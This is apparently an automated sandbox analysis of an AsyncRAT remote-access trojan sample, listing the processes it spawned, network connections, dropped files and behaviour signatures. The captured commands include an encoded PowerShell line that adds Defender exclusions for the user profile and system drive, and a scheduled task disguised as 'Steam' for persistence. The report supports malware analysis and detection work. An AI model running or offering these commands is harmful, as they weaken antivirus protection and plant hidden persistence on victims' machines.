C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| N/A | 10.0.2.15:9090 | | tcp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| N/A | 10.0.2.15:9090 | | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| N/A | 10.0.2.15:9090 | | tcp |
| US | 8.8.8.8:53 | 73.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa | udp |
| N/A | 239.255.255.250:3702 | | udp |
| US | 52.111.227.11:443 | | tcp |
| US | 8.8.8.8:53 | 225.88.219.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.189.21.2.in-addr.arpa | udp |
| US | 147.185.221.19:52033 | tcp | |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1kgkasq.c02.ps1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MAIN.exe.log
C:\Users\Admin\AppData\Local\Temp\tmp4A67.tmp.bat
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\settings\PreSignInSettingsConfig.json
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VLW1SL5J\update100[1].xml
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 07:20
Reported
2024-06-03 07:24
Platform
win7-20240221-en
Max time kernel
150s
Max time network
141s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3044 -s 564
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2456 -s 564
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-974993620-1938430478-38908114-385171956-1942359032166037379948395595-2097600350"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1366695945-1939044485-405268087542048551567893023-120042430913678080031225512765"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4CB9.tmp.bat""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "20005721183767610092050384264-3432325021216569752-1480255568-1031908428-645852718"
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
C:\Users\Admin\AppData\Roaming\Steam.exe
"C:\Users\Admin\AppData\Roaming\Steam.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp70DC.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-531399342165778056906781422141363396-1060219291-5034032141905332277-563561859"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8057.tmp.bat""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3209356941771363768-599244579-17035025121542075587-291538739524266970-2106023698"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1760597343-8288439651944488240-239102127-100156141810872266401751689826208226846"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "464246134-516785921-1804402230-1075254709-670951212192293366716143279881461977868"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1630216740-270672682-13908016851087346497-8557197681493966897845646012-1523906610"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "40315970526016847686875520-2052835158-1570726529-1043843204-1332126734-307665969"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9552789131872800189-1467004871-643479173604001312110694821-571614181204897437"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1798402866-854451321-1498489360-1128336277-133119129215744342521431272360-200970955"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9861232508163872984715320891318032363-1319720850-2688157671497766409-228127435"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
